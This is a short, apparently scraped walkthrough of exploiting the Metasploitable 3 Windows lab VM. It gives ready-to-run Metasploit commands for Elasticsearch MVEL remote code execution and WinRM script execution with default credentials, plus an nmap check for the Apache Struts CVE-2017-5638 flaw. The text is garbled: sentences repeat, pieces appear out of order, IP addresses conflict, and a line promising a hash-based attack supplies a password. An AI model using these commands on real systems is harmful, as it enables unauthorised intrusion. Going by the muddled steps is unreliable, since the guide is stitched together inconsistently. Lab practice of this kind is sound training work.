If you like it or you use it commercially, buy me a beer.
msfconsole msf6 > use exploit/multi/elasticsearch/script_mvel_rce msf6 > set RHOSTS 192.168.56.102 msf6 > set HTTP_PORT 9200 msf6 > set TARGET Windows msf6 > exploit
If successful, you get a java shell. But we need to escalate to Windows cmd.exe. metasploitable 3 windows walkthrough
The scan shows a web server running on port 8585. Browsing to http://192.168.1.105:8585 reveals a Twitter clone application. The backend runs Apache Tomcat, which often utilizes the Struts framework. If successful, you get a java shell
Scanning this port more aggressively with Nmap scripts for Struts vulnerabilities: The scan shows a web server running on port 8585
nmap --script http-vuln-cve2017-5638 -p 8585 192.168.1.105
The result will likely indicate that the server is vulnerable to CVE-2017-5638, a critical Remote Code Execution (RCE) flaw in Apache Struts.
The first rule of Windows hacking: Never assume a port is open just because the service is installed. Windows Firewall complicates things.
If you have a hash (e.g., from SMB capture):
msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 > set RHOSTS 192.168.1.100
msf6 > set USERNAME vagrant
msf6 > set PASSWORD vagrant
msf6 > set FORCE_VBS true
msf6 > exploit